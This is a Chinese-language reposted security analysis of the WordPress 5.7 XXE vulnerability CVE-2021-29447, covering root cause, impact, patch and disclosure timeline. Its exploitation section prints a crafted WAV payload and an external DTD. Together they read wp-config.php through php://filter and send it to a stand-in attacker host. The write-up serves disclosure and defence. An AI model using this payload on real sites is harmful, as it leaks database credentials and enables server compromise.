freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

WordPress 5.7 XXE漏洞分析| CVE-2021-29447
2021-05-10 22:43:49

概括

在此文章中,我们研究了在最流行的内容管理系统WordPress中发现的一个有趣的XXE漏洞。它允许经过身份验证的攻击者从主机服务器泄漏敏感文件,这可能会导致完全破坏。我们展示了这种漏洞的工作方式,以及攻击者如何通过使用盲目的XXE技术来利用它。此外,我们了解了PHP 8代码中的一个相关陷阱,以及开发人员如何在自己的应用程序中防止这种类型的代码漏洞。我们要感谢WordPress团队在新的补丁程序发布过程中的出色协作和快速解决方案。

WordPress是世界上最受欢迎的内容管理系统,大约40%的网站使用WordPress 。这种广泛采用使其成为网络罪犯的首要目标之一。安全社区和漏洞赏金猎人对它的代码进行了严格的审查,这些赏金猎人因报告安全问题而获得报酬。关键的代码问题很少会碰到他们。

在此博客文章中,我们正在调查分析器报告的新漏洞。我们将解释与PHP 8有关的根本原因,并演示攻击者如何利用它来破坏WordPress安装的安全性。我们负责地向WordPress安全团队披露了该代码漏洞,该漏洞已在最新版本5.7.1中修复并分配了CVE-2021-29447

WordPress于2021年4月14日发布了安全和维护更新,以修补该漏洞并保护其用户。

漏洞影响

检测到的代码漏洞是经过身份验证的XML外部实体(XXE)注入。它会影响5.7.1之前的WordPress版本,并且可以允许远程攻击者实现以下目的:

任意文件披露:可以检索主机文件系统上任何文件的内容,例如wp-config.php,其中包含敏感数据,例如数据库凭据。

服务器端请求伪造(SSRF):可以代表WordPress安装发出HTTP请求。根据环境的不同,这可能会产生严重的影响。

漏洞利用条件

仅当WordPress在PHP 8上运行时,才能利用此漏洞。
此外,还需要具有上传媒体文件的权限。在标准的WordPress安装中,这意味着拥有作者权限。但是,与允许访问者上载媒体文件的另一个漏洞或插件结合使用时,可以以较低的特​​权来利用它。

漏洞详情

在本节中,我们将仔细研究该漏洞的技术细节。首先,我们简要回顾一下XXE漏洞是什么。之后,我们通过查看分析器在代码中的位置,深入探讨了分析器在WordPress核心中报告的漏洞,以及为何尽力防止了受影响代码行中的此类漏洞,为什么在PHP 8中再次利用了该漏洞。 最后,我们演示了攻击者如何通过使用特制输入提取wp-config.php文件来利用它,以及如何防止该漏洞。

XML外部实体(XXE)漏洞

XML提供了定义可在整个文档中重用的自定义实体的可能性。例如,这可以用来避免重复。以下代码定义了实体myEntity以便进一步使用。

<!DOCTYPE myDoc [ <!ENTITY myEntity "a long value" > ]>
<myDoc>
    <foo>&myEntity;</foo>
    <bar>&myEntity;</bar>
</myDoc>

定义的实体的值也可以源自URI引用的外部源。在这种情况下,它们称为外部实体:

<!DOCTYPE myDoc [ <!ENTITY myExternalEntity SYSTEM "http://…..com/value.txt" > ]>
<myDoc>
    <foo>&myExternalEntity;</foo>
<myDoc>

XXE攻击滥用了此功能。当在用户控制的内容上运行松散配置的XML解析器时,它们是可能的。松散配置通常意味着在结果中所有实体都被其对应的值替换。例如,在最后一个示例中,如果攻击者将提供文件:///var/www/wp-config.php作为URI并能够查看解析后的XML的结果,那么她将成功泄漏敏感文件的内容。但是,解析后的XML的结果并不总是返回给用户,本文中描述的WordPress漏洞就是这种情况。正如我们稍后将看到的,有一些方法可以解决这个问题。

这是XXE背后的主要思想和机制(在规则数据库中了解更多信息)。除了敏感文件泄漏外,XXE还可能产生其他影响,例如服务器端请求伪造(要检索外部实体的内容,必须发出请求,S5144)和拒绝服务(实体可以引用其他实体,从而导致替换过程中的可能指数增长,也就是十亿次笑声攻击()。

WordPress中的XXE

WordPress有一个媒体库,使经过身份验证的用户可以上传媒体文件,然后可以在其博客文章中使用它们。为了从这些媒体文件中提取元信息,例如艺术家名称或标题,WordPress使用了getID3库。其中一些元数据以XML格式进行解析。在这里,我们的分析仪报告了可能的XXE漏洞(730行)。

wp-includes/ID3/getid3.lib.php

723    if (PHP_VERSION_ID < 80000) {
724
725        // This function has been deprecated in PHP 8.0 because in libxml 2.9.0, external entity loading is
726        // disabled by default, so this function is no longer needed to protect against XXE attacks.
728        $loader = libxml_disable_entity_loader(true);
729    }
730    $XMLobject = simplexml_load_string($XMLstring, 'SimpleXMLElement', LIBXML_NOENT);

使用的simplexml_load_string() function是一个PHP函数,它将传递给第一个参数的字符串解析为XML。可以使用在第三个参数中传递的标志来配置基础XML解析器(PHP依赖Libxml2)。

所显示的代码段中的注释特别引人关注,因为它们提到了针对XXE的保护。在查看静态代码分析器的发现时阅读它们可能会引起怀疑,它是一个假阳性,并且已经采取了正确的预防措施来避免此漏洞。但是,是吗?(剧透:没有)

为了更好地理解代码和周围的注释,查看其历史记录很有用。2014年,WordPress 3.9.2中修复了一个XXE漏洞。这是调用libxml_disable_entity_loader(true)的主要原因在这一点上被添加。PHP函数libxml_disable_entity_loader() 配置XML解析器以禁用外部实体加载。

最近,随着PHP 8的发布,对代码进行了一些改动,以适应libxml_disable_entity_loader() 的弃用。函数,并且仅当正在运行的PHP版本早于8时才调用它。不推荐使用此函数,因为较新的PHP版本使用Libxml2 v2.9 + (默认情况下会禁用外部实体抓取)。

现在,我们正在查看的代码中的微妙之处是simplexml_load_string() 不使用默认配置调用。即使名称可能不建议使用,标志LIBXML_NOENT 启用实体替换。出乎意料的是,在这种情况下,NOENT意味着结果中将不保留任何实体,因此将提取并替换外部实体。结果,再次利用在PHP 8上运行的WordPress实例,可以利用WordPress 3.9.2中修复的XXE漏洞。

Exploitation

要利用所描述的漏洞,必须了解用户控制的数据是否以及如何达到将其解析为$ XMLstring一部分的XML的程度。变量在:

wp-includes/ID3/getid3.lib.php

721    public static function XML2array($XMLstring) {
…
730        $XMLobject = simplexml_load_string($XMLstring, 'SimpleXMLElement', LIBXML_NOENT);

当文件上传到媒体库时,WordPress使用getID3简化了此元数据的提取。对getID3库的调查显示,在分析其元数据时,此时解析的字符串是wave音频文件的iXML块。

wp-includes/ID3/module.audio-video.riff.php

426    if (isset($thisfile_riff_WAVE['iXML'][0]['data'])) {
427        // requires functions simplexml_load_string and get_object_vars
428        if ($parsedXML = getid3_lib::XML2array($thisfile_riff_WAVE['iXML'][0]['data'])) {

WordPress确实允许上传Wave音频文件,并使用wp_read_audio_metadata()提取其元数据。函数(依赖于getID3)。因此,通过上传制作的wave文件,可以注入和解析恶意XML。可以使用以下内容创建一个最小文件,该文件具有要作为wave处理的必要结构,并且在iXML块中包含攻击有效载荷:

RIFFXXXXWAVEBBBBiXML_OUR_PAYLOAD_

(BBBB是四个字节,以小尾数表示XML有效负载的长度。)

XXE盲注

当攻击者使用描述的策略注入有效负载时,已解析XML的结果不会显示在用户界面中。因此,要提取敏感文件(例如wp-config.php)的内容,攻击者必须依靠盲目的XXE技术(也称为带外XXE)来实现此目的。这类似于我们先前关于利用Shopware的博客文章中描述的技术。基本思想是这样的:

创建第一个外部实体(例如%data),其值将替换为文件的内容。

创建另一个外部实体,其URI设置为“ http://attacker_domain.com/%data ; ”。请注意,URI的值包含将被替换的第一个实体。

当解析第二个实体时,解析器将向“ http://attacker_domain.com/ _SUBSTITUTED_data ”发出请求,从而使文件的内容在Web服务器的日志中可见。

为了使外部实体的URI依赖于另一个替换实体的值,我们确实使用了参数实体和外部DTD。此外,我们利用php://流包装器来压缩和编码文件的内容。放在一起,以下内容将导致提取敏感的wp-config.php文件:

payload.wav

RIFFXXXXWAVEBBBBiXML<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://attacker-url.domain/xxe.dtd">
%sp;
%param1;
]>
<r>&exfil;</r>>

(BBBB是四个字节,以小尾数表示XML有效负载的长度。)

xxe.dtd

<!ENTITY % data SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=../wp-config.php">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://attacker-url.domain/?%data;'>">

修复

WordPress通过重新引入对libxml_disable_entity_loader()的调用来修补了5.7.1版中的漏洞。PHP 8中不推荐使用的函数,即使是较新的PHP版本。为避免PHP弃用警告,请使用PHP错误抑制运算符@已添加到通话中。

wp-includes/ID3/getid3.lib.php

721    public static function XML2array($XMLstring) {
…
727      $loader = @libxml_disable_entity_loader(true);
728      $XMLobject = simplexml_load_string($XMLstring, 'SimpleXMLElement', LIBXML_NOENT);

重新引入对不推荐使用的函数的调用的另一种方法是使用PHP的libxml_set_external_entity_loader()函数。根据PHP文档,这是推荐的方法。在需要加载特定资源的情况下,它还允许对外部实体加载程序进行更精细的控制。当然,只有在PHP 8中确实需要实体替换的情况下,才需要这样做。

时间线

日期什么
04.02.2021我们在Hackerone上报告PoC的漏洞
05.02.2021WordPress确认收到报告
01.03.2021WordPress向我们更新了有关分类和正在进行中的修复的信息
08.03.2021WordPress通知我们即将发布的安全性
14.04.2021WordPress发布5.7.1版
# web安全
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录